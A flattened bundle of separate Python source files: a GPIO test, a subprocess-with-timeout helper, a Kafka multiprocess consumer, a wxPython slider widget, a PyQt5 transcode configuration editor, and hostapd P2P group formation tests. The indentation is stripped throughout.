# self.assertTrue(poll_ret.get() == False)
# self.assertTrue(gpio_in.get() == True)
# gpio_in.edge = "both"
# poll_ret = threaded_poll(gpio_in, 5)
# time.sleep(1)
# gpio_out.set(False)
# self.assertTrue(poll_ret.get() == True)
# self.assertTrue(gpio_in.get() == False)
# poll_ret = threaded_poll(gpio_in, 5)
# time.sleep(1)
# gpio_out.set(True)
# self.assertTrue(poll_ret.get() == True)
# self.assertTrue(gpio_in.get() == True)
# self.assertTrue(gpio_in.poll(1) == False)
@unittest.skipIf(os.environ.get('NOINTERACTIVE', False), "interactive disabled")
def test_interactive(self):
gpio = GPIO(pin_output, "out")
gpio.set(False)
self.assertTrue(raw_input("GPIO out is low? y/n ") == "y")
gpio.set(True)
self.assertTrue(raw_input("GPIO out is high? y/n ") == "y")
gpio.set(False)
self.assertTrue(raw_input("GPIO out is low? y/n ") == "y")
gpio.close()
if __name__ == '__main__':
unittest.main()
|
timed_subprocess.py | # -*- coding: utf-8 -*-
'''
For running command line executables with a timeout
'''
import shlex
import subprocess
import threading
import hubblestack.exceptions
import hubblestack.utils.data
import hubblestack.utils.stringutils
class TimedProc(object):
'''
Create a TimedProc object, calls subprocess.Popen with passed args and **kwargs
'''
def __init__(self, args, **kwargs):
self.wait = not kwargs.pop('bg', False)
self.stdin = kwargs.pop('stdin', None)
self.with_communicate = kwargs.pop('with_communicate', self.wait)
self.timeout = kwargs.pop('timeout', None)
self.stdin_raw_newlines = kwargs.pop('stdin_raw_newlines', False)
# If you're not willing to wait for the process
# you can't define any stdin, stdout or stderr
if not self.wait:
self.stdin = kwargs['stdin'] = None
self.with_communicate = False
elif self.stdin is not None:
if not self.stdin_raw_newlines:
# Translate a newline submitted as '\n' on the CLI to an actual
# newline character.
self.stdin = hubblestack.utils.stringutils.to_bytes(self.stdin.replace('\\n', '\n'))
kwargs['stdin'] = subprocess.PIPE
if not self.with_communicate:
self.stdout = kwargs['stdout'] = None
self.stderr = kwargs['stderr'] = None
if self.timeout and not isinstance(self.timeout, (int, float)):
raise hubblestack.exceptions.TimedProcTimeoutError('Error: timeout {0} must be a number'.format(self.timeout))
if kwargs.get('shell', False):
args = hubblestack.utils.data.decode(args, to_str=True)
try:
self.process = subprocess.Popen(args, **kwargs)
except (AttributeError, TypeError):
if not kwargs.get('shell', False):
if not isinstance(args, (list, tuple)):
try:
args = shlex.split(args)
except AttributeError:
args = shlex.split(str(args))
str_args = []
for arg in args:
if not isinstance(arg, str):
str_args.append(str(arg))
else:
str_args.append(arg)
args = str_args
else:
if not isinstance(args, (list, tuple, str)):
# Handle corner case where someone does a 'cmd.run 3'
args = str(args)
# Ensure that environment variables are strings
for key, val in iter(kwargs.get('env', {}).items()):
if not isinstance(val, str):
kwargs['env'][key] = str(val)
if not isinstance(key, str):
kwargs['env'][str(key)] = kwargs['env'].pop(key)
args = hubblestack.utils.data.decode(args)
self.process = subprocess.Popen(args, **kwargs)
self.command = args
def run(self):
'''
wait for subprocess to terminate and return subprocess' return code.
If timeout is reached, throw TimedProcTimeoutError
'''
def receive():
if self.with_communicate:
self.stdout, self.stderr = self.process.communicate(input=self.stdin)
elif self.wait:
self.process.wait()
if not self.timeout:
receive()
else:
rt = threading.Thread(target=receive)
rt.start()
rt.join(self.timeout)
if rt.isAlive():
# Subprocess cleanup (best effort)
self.process.kill()
def terminate():
if rt.isAlive():
self.process.terminate()
threading.Timer(10, terminate).start()
raise hubblestack.exceptions.TimedProcTimeoutError(
'{0} : Timed out after {1} seconds'.format(
self.command,
str(self.timeout),
)
)
return self.process.returncode
|
multiprocess.py | from __future__ import absolute_import
import logging
import time
from multiprocessing import Process, Queue as MPQueue, Event, Value
try:
from Queue import Empty
except ImportError: # python 2
from queue import Empty
from .base import (
AUTO_COMMIT_MSG_COUNT, AUTO_COMMIT_INTERVAL,
NO_MESSAGES_WAIT_TIME_SECONDS
)
from .simple import Consumer, SimpleConsumer
log = logging.getLogger("kafka")
def _mp_consume(client, group, topic, chunk, queue, start, exit, pause, size):
"""
A child process worker which consumes messages based on the
notifications given by the controller process
NOTE: Ideally, this should have been a method inside the Consumer
class. However, multiprocessing module has issues in windows. The
functionality breaks unless this function is kept outside of a class
"""
# Make the child processes open separate socket connections
client.reinit()
# We will start consumers without auto-commit. Auto-commit will be
# done by the master controller process.
consumer = SimpleConsumer(client, group, topic,
partitions=chunk,
auto_commit=False,
auto_commit_every_n=None,
auto_commit_every_t=None)
# Ensure that the consumer provides the partition information
consumer.provide_partition_info()
while True:
# Wait till the controller indicates us to start consumption
start.wait()
# If we are asked to quit, do so
if exit.is_set():
break
# Consume messages and add them to the queue. If the controller
# indicates a specific number of messages, follow that advice
count = 0
message = consumer.get_message()
if message:
queue.put(message)
count += 1
# We have reached the required size. The controller might have
# more than what he needs. Wait for a while.
# Without this logic, it is possible that we run into a big
# loop consuming all available messages before the controller
# can reset the 'start' event
if count == size.value:
pause.wait()
else:
# In case we did not receive any message, give up the CPU for
# a while before we try again
time.sleep(NO_MESSAGES_WAIT_TIME_SECONDS)
consumer.stop()
class MultiProcessConsumer(Consumer):
"""
A consumer implementation that consumes partitions for a topic in
parallel using multiple processes
client: a connected KafkaClient
group: a name for this consumer, used for offset storage and must be unique
topic: the topic to consume
auto_commit: default True. Whether or not to auto commit the offsets
auto_commit_every_n: default 100. How many messages to consume
before a commit
auto_commit_every_t: default 5000. How much time (in milliseconds) to
wait before commit
num_procs: Number of processes to start for consuming messages.
The available partitions will be divided among these processes
partitions_per_proc: Number of partitions to be allocated per process
(overrides num_procs)
Auto commit details:
If both auto_commit_every_n and auto_commit_every_t are set, they will
reset one another when one is triggered. These triggers simply call the
commit method on this class. A manual call to commit will also reset
these triggers
"""
def __init__(self, client, group, topic, auto_commit=True,
auto_commit_every_n=AUTO_COMMIT_MSG_COUNT,
auto_commit_every_t=AUTO_COMMIT_INTERVAL,
num_procs=1, partitions_per_proc=0):
# Initiate the base consumer class
super(MultiProcessConsumer, self).__init__(
client, group, topic,
partitions=None,
auto_commit=auto_commit,
auto_commit_every_n=auto_commit_every_n,
auto_commit_every_t=auto_commit_every_t)
# Variables for managing and controlling the data flow from
# consumer child process to master
self.queue = MPQueue(1024) # Child consumers dump messages into this
self.start = Event() # Indicates the consumers to start fetch
self.exit = Event() # Requests the consumers to shutdown
self.pause = Event() # Requests the consumers to pause fetch
self.size = Value('i', 0) # Indicator of number of messages to fetch
partitions = self.offsets.keys()
# If unspecified, start one consumer per partition
# The logic below ensures that
# * we do not cross the num_procs limit
# * we have an even distribution of partitions among processes
if not partitions_per_proc:
partitions_per_proc = round(len(partitions) * 1.0 / num_procs)
if partitions_per_proc < num_procs * 0.5:
partitions_per_proc += 1
# The final set of chunks
chunker = lambda *x: [] + list(x)
chunks = map(chunker, *[iter(partitions)] * int(partitions_per_proc))
self.procs = []
for chunk in chunks:
chunk = filter(lambda x: x is not None, chunk)
args = (client.copy(),
group, topic, list(chunk),
self.queue, self.start, self.exit,
self.pause, self.size)
proc = Process(target=_mp_consume, args=args)
proc.daemon = True
proc.start()
self.procs.append(proc)
def __repr__(self):
return '<MultiProcessConsumer group=%s, topic=%s, consumers=%d>' % \
(self.group, self.topic, len(self.procs))
def stop(self):
# Set exit and start off all waiting consumers
self.exit.set()
self.pause.set()
self.start.set()
for proc in self.procs:
proc.join()
proc.terminate()
super(MultiProcessConsumer, self).stop()
def __iter__(self):
"""
Iterator to consume the messages available on this consumer
"""
# Trigger the consumer procs to start off.
# We will iterate till there are no more messages available
self.size.value = 0
self.pause.set()
while True:
self.start.set()
try:
# We will block for a small while so that the consumers get
# a chance to run and put some messages in the queue
# TODO: This is a hack and will make the consumer block for
# at least one second. Need to find a better way of doing this
partition, message = self.queue.get(block=True, timeout=1)
except Empty:
break
# Count, check and commit messages if necessary
self.offsets[partition] = message.offset + 1
self.start.clear()
self.count_since_commit += 1
self._auto_commit()
yield message
self.start.clear()
def get_messages(self, count=1, block=True, timeout=10):
"""
Fetch the specified number of messages
count: Indicates the maximum number of messages to be fetched
block: If True, the API will block till some messages are fetched.
timeout: If block is True, the function will block for the specified
time (in seconds) until count messages is fetched. If None,
it will block forever.
"""
messages = []
# Give a size hint to the consumers. Each consumer process will fetch
# a maximum of "count" messages. This will fetch more messages than
# necessary, but these will not be committed to kafka. Also, the extra
# messages can be provided in subsequent runs
self.size.value = count
self.pause.clear()
if timeout is not None:
max_time = time.time() + timeout
new_offsets = {}
while count > 0 and (timeout is None or timeout > 0):
# Trigger consumption only if the queue is empty
# By doing this, we will ensure that consumers do not
# go into overdrive and keep consuming thousands of
# messages when the user might need only a few
if self.queue.empty():
self.start.set()
try:
partition, message = self.queue.get(block, timeout)
except Empty:
break
messages.append(message)
new_offsets[partition] = message.offset + 1
count -= 1
if timeout is not None:
timeout = max_time - time.time()
self.size.value = 0
self.start.clear()
self.pause.set()
# Update and commit offsets if necessary
self.offsets.update(new_offsets)
self.count_since_commit += len(messages)
self._auto_commit()
return messages
|
skill_slider.py | import time
from threading import Thread
import wx
class SlidersInputFrame(wx.Frame):
def __init__(self, dim=3):
super().__init__(parent=None, title="Sliders", size=(400, dim*100 - 20))
panel = wx.Panel(self)
sizer = wx.BoxSizer(wx.VERTICAL)
title = wx.StaticText(panel, style=wx.ALIGN_RIGHT, label="Percentages of 1 (5 means 0.05).")
sizer.Add(title, 0, wx.ALIGN_CENTER)
self._sliders = [_make_slider(panel) for _ in range(dim)]
for slider in self._sliders:
sizer.Add(slider, 0, wx.ALL | wx.EXPAND, 5)
panel.SetSizer(sizer)
self.Show()
def get_slider_values(self):
return [s.GetValue() / 100.0 for s in self._sliders]
def _make_slider(parent):
style = wx.SL_MIN_MAX_LABELS | wx.SL_VALUE_LABEL
return wx.Slider(parent, value=0.0, minValue=-100, maxValue=100, style=style)
def create_sliders_widget(dim=5) -> SlidersInputFrame:
app = wx.App()
frame = SlidersInputFrame(dim=dim)
t = Thread(target=app.MainLoop)
t.setDaemon(True)
t.start()
return frame
if __name__ == '__main__':
widget = create_sliders_widget()
while True:
print(widget.get_slider_values(), flush=True)
time.sleep(0.1) |
qconfig.py | from PyQt5.QtCore import Qt, pyqtSignal, pyqtBoundSignal
from PyQt5.QtGui import QFont, QIcon
from .qinputtracklist import QInputFiles
from .qfilterlist import QFilterList
from .qavailablefilters import QAvailableFilters
from .qoutputfiles import QOutputFiles
from .qoutputconfig import QOutputConfig
from PyQt5.QtWidgets import (QWidget, QMainWindow, QVBoxLayout, QHBoxLayout,
QSplitter, QMessageBox, QLabel, QAction,
QFileDialog, QToolBar)
import threading
from transcode.config import Config
from transcode.config.ebml import ConfigElement
from transcode.filters import filters
import os
import sys
import types
import traceback
import time
class QConfig(QWidget):
contentsModified = pyqtSignal()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
layout = QVBoxLayout()
self.setLayout(layout)
splitter = QSplitter(Qt.Vertical, self)
layout.addWidget(splitter)
inputWidget = QWidget(splitter)
inputLayout = QVBoxLayout()
inputLayout.setContentsMargins(0, 8, 0, 0)
inputWidget.setLayout(inputLayout)
inputLabelLayout = QHBoxLayout()
inputFilesLabel = QLabel("Input Files", inputWidget)
inputFilesLabel.setFont(
QFont("DejaVu Serif", 18, QFont.Bold, italic=True))
inputLabelLayout.addWidget(inputFilesLabel)
inputLabelLayout.addStretch()
inputLayout.addLayout(inputLabelLayout)
self.inputFiles = QInputFiles(inputWidget)
self.inputFiles.inputFileList.contentsModified.connect(
self.contentsModified)
inputLayout.addWidget(self.inputFiles)
splitter.addWidget(inputWidget)
# ---
filtersWidget = QWidget(splitter)
filtersLayout = QVBoxLayout()
filtersLayout.setContentsMargins(0, 8, 0, 0)
filtersWidget.setLayout(filtersLayout)
filtersLabelLayout = QHBoxLayout()
filtersFilesLabel = QLabel("Filter Chains", filtersWidget)
filtersFilesLabel.setFont(
QFont("DejaVu Serif", 18, QFont.Bold, italic=True))
filtersLabelLayout.addWidget(filtersFilesLabel)
filtersLabelLayout.addStretch()
filtersLayout.addLayout(filtersLabelLayout)
subsplitter = QSplitter(Qt.Horizontal, filtersWidget)
self.availableFilters = QAvailableFilters(subsplitter)
self.availableFilters.setAvailableFilters(filters.values())
self.currentFilters = QFilterList(subsplitter)
self.currentFilters.contentsModified.connect(self.contentsModified)
subsplitter.addWidget(self.availableFilters)
subsplitter.addWidget(self.currentFilters)
filtersLayout.addWidget(subsplitter)
splitter.addWidget(filtersWidget)
# ---
subsplitter = QSplitter(Qt.Horizontal, splitter)
outputFilesWidget = QWidget(subsplitter)
outputFilesLayout = QVBoxLayout()
outputFilesLayout.setContentsMargins(0, 16, 0, 0)
outputFilesWidget.setLayout(outputFilesLayout)
outputFilesLabelLayout = QHBoxLayout()
outputFilesLabel = QLabel("Output Files", outputFilesWidget)
outputFilesLabel.setFont(
QFont("DejaVu Serif", 18, QFont.Bold, italic=True))
outputFilesLabelLayout.addWidget(outputFilesLabel)
outputFilesLabelLayout.addStretch()
outputFilesLayout.addLayout(outputFilesLabelLayout)
self.outputFiles = QOutputFiles(outputFilesWidget)
self.outputFiles.outputFileList.contentsModified.connect(
self.contentsModified)
outputFilesLayout.addWidget(self.outputFiles)
outputConfigWidget = QWidget(subsplitter)
outputConfigLayout = QVBoxLayout()
outputConfigLayout.setContentsMargins(0, 16, 0, 0)
outputConfigWidget.setLayout(outputConfigLayout)
outputConfigLabelLayout = QHBoxLayout()
outputConfigLabel = QLabel("Tracks", outputConfigWidget)
outputConfigLabel.setFont(
QFont("DejaVu Serif", 18, QFont.Bold, italic=True))
outputConfigLabelLayout.addWidget(outputConfigLabel)
outputConfigLabelLayout.addStretch()
outputConfigLayout.addLayout(outputConfigLabelLayout)
self.outputConfig = QOutputConfig(self)
self.outputConfig.contentsModified.connect(self.contentsModified)
outputConfigLayout.addWidget(self.outputConfig)
splitter.addWidget(subsplitter)
subsplitter.addWidget(outputFilesWidget)
subsplitter.addWidget(outputConfigWidget)
self.setConfig(None)
def selectOutputFile(self, newindex, oldindex):
output_file = newindex.data(Qt.UserRole)
self.outputConfig.setOutputFile(output_file)
def setConfig(self, config):
self.config = config
if config is not None:
self.inputFiles.setInputFiles(config.input_files)
self.currentFilters.setFilters(config.filter_chains)
self.outputFiles.setOutputFiles(config.output_files)
self.outputConfig.setOutputFile(None)
self.outputFiles.outputFileList.selectionModel(
).currentRowChanged.connect(self.selectOutputFile)
if self.outputFiles.outputFileList.model().rowCount():
self.outputFiles.outputFileList.setCurrentIndex(
self.outputFiles.outputFileList.model().index(0, 0))
class QConfigWindow(QMainWindow):
fileLoading = pyqtSignal()
fileLoaded = pyqtSignal()
configLoaded = pyqtSignal(Config)
delayedOpen = pyqtSignal()
delayedNew = pyqtSignal()
delayedExit = pyqtSignal()
exceptionCaptured = pyqtSignal(type, BaseException, types.TracebackType)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setWindowTitle("QTranscode Editor")
self.configWidget = QConfig(self)
self.setCentralWidget(self.configWidget)
self.configWidget.contentsModified.connect(self.isModified)
self.newAct = QAction("&New", self, shortcut="Ctrl+N",
triggered=self.fileNew)
self.newAct.setIcon(QIcon.fromTheme("document-new"))
self.addAction(self.newAct)
self.openAct = QAction("&Open...", self, shortcut="Ctrl+O",
triggered=self.fileOpen)
self.openAct.setIcon(QIcon.fromTheme("document-open"))
self.addAction(self.openAct)
self.saveAct = QAction("&Save", self, shortcut="Ctrl+S",
triggered=self.fileSave, enabled=False)
self.saveAct.setIcon(QIcon.fromTheme("document-save"))
self.addAction(self.saveAct)
self.saveAsAct = QAction("Save As...", self, shortcut="Ctrl+Shift+S",
triggered=self.fileSaveAs, enabled=False)
self.saveAsAct.setIcon(QIcon.fromTheme("document-save-as"))
self.addAction(self.saveAsAct)
self.exitAct = QAction("E&xit", self, shortcut="Ctrl+Q",
triggered=self.close)
self.exitAct.setIcon(QIcon.fromTheme("application-exit"))
self.addAction(self.exitAct)
self.toolBar = QToolBar(self)
self.toolBar.addAction(self.newAct)
self.toolBar.addAction(self.openAct)
self.toolBar.addAction(self.saveAct)
self.toolBar.addAction(self.saveAsAct)
self.toolBar.addSeparator()
self.toolBar.addAction(self.exitAct)
self.addToolBar(self.toolBar)
self.configLoaded.connect(self.loadConfig)
self.delayedOpen.connect(self.fileOpen)
self.delayedNew.connect(self.fileNew)
self.delayedExit.connect(self.close)
self.fileLoading.connect(self._handleFileLoading)
self.fileLoaded.connect(self._handleFileLoaded)
self.exceptionCaptured.connect(self._handleException)
self.loading = False
self.loadConfig(Config())
def isModified(self):
self.saveAct.setEnabled(True)
self._modified = True
def notModified(self):
self.saveAct.setEnabled(False)
self._modified = False
def loadConfig(self, config):
self.config = config
self.configWidget.setConfig(config)
self._updateWindowTitle()
self.notModified()
def fileNew(self):
if self._modified:
reply = self.saveChangesDlg()
if reply == QMessageBox.Yes:
self.fileSave(self.delayedNew)
return
elif reply == QMessageBox.Cancel:
return
self.loadConfig(Config())
def fileOpen(self):
if self._modified:
reply = self.saveChangesDlg()
if reply == QMessageBox.Yes:
self.fileSave(self.delayedOpen)
return
elif reply == QMessageBox.Cancel:
return
filters = "All supported files (*.ptc *.ptc.gz *.ptc.bz2 *.ptc.xz)"
fileName, _ = QFileDialog.getOpenFileName(self, "Open File",
None, filters)
if fileName:
t = threading.Thread(target=self.loadFile,
args=(fileName,), kwargs={})
t.start()
def fileSave(self, signal=None, signalargs=()):
if self.config.configname or self.saveDlg():
t = threading.Thread(target=self._save, args=(signal, signalargs))
t.start()
return
return False
def saveDlg(self):
filters = "Session files (*.ptc.xz)"
defaultname = self.config.configname or "untitled.ptc.xz"
fileName, _ = QFileDialog.getSaveFileName(self, "Save File",
str(defaultname), filters)
if fileName:
self.config.configname = fileName
return fileName
def _save(self, signal=None, signalargs=()):
self.fileLoading.emit()
fileName = self.config.configname
try:
if os.path.isfile(fileName):
T = time.localtime()
backup = (f"{fileName}-backup-"
f"{T.tm_year:04d}.{T.tm_mon:02d}.{T.tm_mday:02d}-"
f"{T.tm_hour:02d}.{T.tm_min:02d}.{T.tm_sec:02d}")
try:
os.rename(fileName, backup)
except Exception:
backup = None
else:
backup = None
try:
ConfigElement.save(self.config, fileName)
except Exception:
self.exceptionCaptured.emit(*sys.exc_info())
if backup:
os.rename(backup, fileName)
self._modified = False
finally:
self.fileLoaded.emit()
if isinstance(signal, (pyqtSignal, pyqtBoundSignal)):
signal.emit(*signalargs)
def fileSaveAs(self):
fileName = self.saveDlg()
if fileName:
self.config.configname = fileName
self.fileSave()
return fileName
def _updateWindowTitle(self):
if self.config.configname:
self.setWindowTitle(
f"QTranscode Editor - [{self.config.configname}]")
else:
self.setWindowTitle("QTranscode Editor - Untitled")
def _handleFileLoading(self):
self.loading = True
self.setDisabled(True)
def _handleFileLoaded(self):
self.loading = False
self.setDisabled(False)
self.saveAct.setEnabled(False)
self.saveAsAct.setEnabled(True)
self._updateWindowTitle()
self.configWidget.outputConfig.updateOutputPath()
def loadFile(self, fileName):
fileDir, _ = os.path.split(fileName)
fileStem, _ = os.path.splitext(fileName)
fileDir = os.path.abspath(fileDir)
self.fileLoading.emit()
try:
config = ConfigElement.load(fileName)
self.configLoaded.emit(config)
except Exception:
self.exceptionCaptured.emit(*sys.exc_info())
finally:
self.fileLoaded.emit()
def saveChangesDlg(self):
answer = QMessageBox.question(
self, "Save Changes?", "Do you wish to save changes?",
QMessageBox.Yes | QMessageBox.No | QMessageBox.Cancel)
return answer
def _handleException(self, cls, exc, tb):
print("\n".join(traceback.format_exception(cls, exc, tb)),
file=sys.stderr)
excmsg = QMessageBox(self)
excmsg.setWindowTitle(cls.__name__)
excmsg.setText(str(exc))
excmsg.setStandardButtons(QMessageBox.Ok)
excmsg.setIcon(QMessageBox.Critical)
excmsg.exec_()
def closeEvent(self, event):
if self.loading:
event.ignore()
return
if self._modified:
reply = self.saveChangesDlg()
if reply == QMessageBox.Yes:
self.fileSave(self.delayedExit)
event.ignore()
return
elif reply == QMessageBox.No:
event.accept()
elif reply == QMessageBox.Cancel:
event.ignore()
return
event.accept()
def main():
import argparse
import sys
parser = argparse.ArgumentParser(description="QTranscode Configuration.")
parser.add_argument("file", action='store', help="Config file", nargs="?")
args = parser.parse_args()
from PyQt5.QtWidgets import QApplication
app = QApplication(sys.argv)
win = QConfigWindow()
win.show()
if args.file:
t = threading.Thread(target=win.loadFile, args=(args.file,), kwargs={})
t.start()
# t = QThread.create(win.loadFile, (args.file,))
# t.run()
app.exec_()
return win.config
if __name__ == "__main__":
main()
|
test_p2p_grpform.py | # P2P group formation test cases
# Copyright (c) 2013-2014, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import logging
logger = logging.getLogger()
import time
import threading
import Queue
import os
import hostapd
import hwsim_utils
import utils
from utils import HwsimSkip
from wpasupplicant import WpaSupplicant
def check_grpform_results(i_res, r_res):
if i_res['result'] != 'success' or r_res['result'] != 'success':
raise Exception("Failed group formation")
if i_res['ssid'] != r_res['ssid']:
raise Exception("SSID mismatch")
if i_res['freq'] != r_res['freq']:
raise Exception("freq mismatch")
if 'go_neg_freq' in r_res and i_res['go_neg_freq'] != r_res['go_neg_freq']:
raise Exception("go_neg_freq mismatch")
if i_res['freq'] != i_res['go_neg_freq']:
raise Exception("freq/go_neg_freq mismatch")
if i_res['role'] != i_res['go_neg_role']:
raise Exception("role/go_neg_role mismatch")
if 'go_neg_role' in r_res and r_res['role'] != r_res['go_neg_role']:
raise Exception("role/go_neg_role mismatch")
if i_res['go_dev_addr'] != r_res['go_dev_addr']:
raise Exception("GO Device Address mismatch")
def go_neg_init(i_dev, r_dev, pin, i_method, i_intent, res):
logger.debug("Initiate GO Negotiation from i_dev")
try:
i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), pin, i_method, timeout=20, go_intent=i_intent)
logger.debug("i_res: " + str(i_res))
except Exception, e:
i_res = None
logger.info("go_neg_init thread caught an exception from p2p_go_neg_init: " + str(e))
res.put(i_res)
def go_neg_pin(i_dev, r_dev, i_intent=None, r_intent=None, i_method='enter', r_method='display'):
r_dev.p2p_listen()
i_dev.p2p_listen()
pin = r_dev.wps_read_pin()
logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
r_dev.dump_monitor()
res = Queue.Queue()
t = threading.Thread(target=go_neg_init, args=(i_dev, r_dev, pin, i_method, i_intent, res))
t.start()
logger.debug("Wait for GO Negotiation Request on r_dev")
ev = r_dev.wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=15)
if ev is None:
raise Exception("GO Negotiation timed out")
r_dev.dump_monitor()
logger.debug("Re-initiate GO Negotiation from r_dev")
r_res = r_dev.p2p_go_neg_init(i_dev.p2p_dev_addr(), pin, r_method, go_intent=r_intent, timeout=20)
logger.debug("r_res: " + str(r_res))
r_dev.dump_monitor()
t.join()
i_res = res.get()
if i_res is None:
raise Exception("go_neg_init thread failed")
logger.debug("i_res: " + str(i_res))
logger.info("Group formed")
hwsim_utils.test_connectivity_p2p(r_dev, i_dev)
i_dev.dump_monitor()
return [i_res, r_res]
def go_neg_pin_authorized(i_dev, r_dev, i_intent=None, r_intent=None, expect_failure=False, i_go_neg_status=None, i_method='enter', r_method='display', test_data=True, i_freq=None, r_freq=None):
i_dev.p2p_listen()
pin = r_dev.wps_read_pin()
logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
r_dev.p2p_go_neg_auth(i_dev.p2p_dev_addr(), pin, r_method, go_intent=r_intent, freq=r_freq)
r_dev.p2p_listen()
i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), pin, i_method, timeout=20, go_intent=i_intent, expect_failure=expect_failure, freq=i_freq)
r_res = r_dev.p2p_go_neg_auth_result(expect_failure=expect_failure)
logger.debug("i_res: " + str(i_res))
logger.debug("r_res: " + str(r_res))
r_dev.dump_monitor()
i_dev.dump_monitor()
if i_go_neg_status:
if i_res['result'] != 'go-neg-failed':
raise Exception("Expected GO Negotiation failure not reported")
if i_res['status'] != i_go_neg_status:
raise Exception("Expected GO Negotiation status not seen")
if expect_failure:
return
logger.info("Group formed")
if test_data:
hwsim_utils.test_connectivity_p2p(r_dev, i_dev)
return [i_res, r_res]
def go_neg_init_pbc(i_dev, r_dev, i_intent, res, freq, provdisc):
logger.debug("Initiate GO Negotiation from i_dev")
try:
i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), None, "pbc",
timeout=20, go_intent=i_intent, freq=freq,
provdisc=provdisc)
logger.debug("i_res: " + str(i_res))
except Exception, e:
i_res = None
logger.info("go_neg_init_pbc thread caught an exception from p2p_go_neg_init: " + str(e))
res.put(i_res)
def go_neg_pbc(i_dev, r_dev, i_intent=None, r_intent=None, i_freq=None, r_freq=None, provdisc=False, r_listen=False):
if r_listen:
r_dev.p2p_listen()
else:
r_dev.p2p_find(social=True)
i_dev.p2p_find(social=True)
logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
r_dev.dump_monitor()
res = Queue.Queue()
t = threading.Thread(target=go_neg_init_pbc, args=(i_dev, r_dev, i_intent, res, i_freq, provdisc))
t.start()
logger.debug("Wait for GO Negotiation Request on r_dev")
ev = r_dev.wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=15)
if ev is None:
raise Exception("GO Negotiation timed out")
r_dev.dump_monitor()
# Allow some time for the GO Neg Resp to go out before initializing new
# GO Negotiation.
time.sleep(0.2)
logger.debug("Re-initiate GO Negotiation from r_dev")
r_res = r_dev.p2p_go_neg_init(i_dev.p2p_dev_addr(), None, "pbc",
go_intent=r_intent, timeout=20, freq=r_freq)
logger.debug("r_res: " + str(r_res))
r_dev.dump_monitor()
t.join()
i_res = res.get()
if i_res is None:
raise Exception("go_neg_init_pbc thread failed")
logger.debug("i_res: " + str(i_res))
logger.info("Group formed")
hwsim_utils.test_connectivity_p2p(r_dev, i_dev)
i_dev.dump_monitor()
return [i_res, r_res]
def go_neg_pbc_authorized(i_dev, r_dev, i_intent=None, r_intent=None,
expect_failure=False, i_freq=None, r_freq=None):
i_dev.p2p_listen()
logger.info("Start GO negotiation " + i_dev.ifname + " -> " + r_dev.ifname)
r_dev.p2p_go_neg_auth(i_dev.p2p_dev_addr(), None, "pbc",
go_intent=r_intent, freq=r_freq)
r_dev.p2p_listen()
i_res = i_dev.p2p_go_neg_init(r_dev.p2p_dev_addr(), None, "pbc", timeout=20,
go_intent=i_intent,
expect_failure=expect_failure, freq=i_freq)
r_res = r_dev.p2p_go_neg_auth_result(expect_failure=expect_failure)
logger.debug("i_res: " + str(i_res))
logger.debug("r_res: " + str(r_res))
r_dev.dump_monitor()
i_dev.dump_monitor()
if expect_failure:
return
logger.info("Group formed")
return [i_res, r_res]
def remove_group(dev1, dev2):
dev1.remove_group()
try:
dev2.remove_group()
except:
pass
def test_grpform(dev):
"""P2P group formation using PIN and authorized connection (init -> GO)"""
try:
dev[0].request("SET p2p_group_idle 2")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0)
check_grpform_results(i_res, r_res)
dev[1].remove_group()
ev = dev[0].wait_global_event(["P2P-GROUP-REMOVED"], timeout=10)
if ev is None:
raise Exception("GO did not remove group on idle timeout")
if "GO reason=IDLE" not in ev:
raise Exception("Unexpected group removal event: " + ev)
finally:
dev[0].request("SET p2p_group_idle 0")
def test_grpform_a(dev):
"""P2P group formation using PIN and authorized connection (init -> GO) (init: group iface)"""
dev[0].request("SET p2p_no_group_iface 0")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0)
if "p2p-wlan" not in i_res['ifname']:
raise Exception("Unexpected group interface name")
check_grpform_results(i_res, r_res)
remove_group(dev[0], dev[1])
if i_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
def test_grpform_b(dev):
"""P2P group formation using PIN and authorized connection (init -> GO) (resp: group iface)"""
dev[1].request("SET p2p_no_group_iface 0")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0)
if "p2p-wlan" not in r_res['ifname']:
raise Exception("Unexpected group interface name")
check_grpform_results(i_res, r_res)
remove_group(dev[0], dev[1])
if r_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
def test_grpform_c(dev):
"""P2P group formation using PIN and authorized connection (init -> GO) (group iface)"""
dev[0].request("SET p2p_no_group_iface 0")
dev[1].request("SET p2p_no_group_iface 0")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
r_dev=dev[1], r_intent=0)
if "p2p-wlan" not in i_res['ifname']:
raise Exception("Unexpected group interface name")
if "p2p-wlan" not in r_res['ifname']:
raise Exception("Unexpected group interface name")
check_grpform_results(i_res, r_res)
remove_group(dev[0], dev[1])
if i_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
if r_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
def test_grpform2(dev):
"""P2P group formation using PIN and authorized connection (resp -> GO)"""
go_neg_pin_authorized(i_dev=dev[0], i_intent=0, r_dev=dev[1], r_intent=15)
remove_group(dev[0], dev[1])
def test_grpform2_c(dev):
"""P2P group formation using PIN and authorized connection (resp -> GO) (group iface)"""
dev[0].request("SET p2p_no_group_iface 0")
dev[1].request("SET p2p_no_group_iface 0")
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0, r_dev=dev[1], r_intent=15)
remove_group(dev[0], dev[1])
if i_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
if r_res['ifname'] in utils.get_ifnames():
raise Exception("Group interface netdev was not removed")
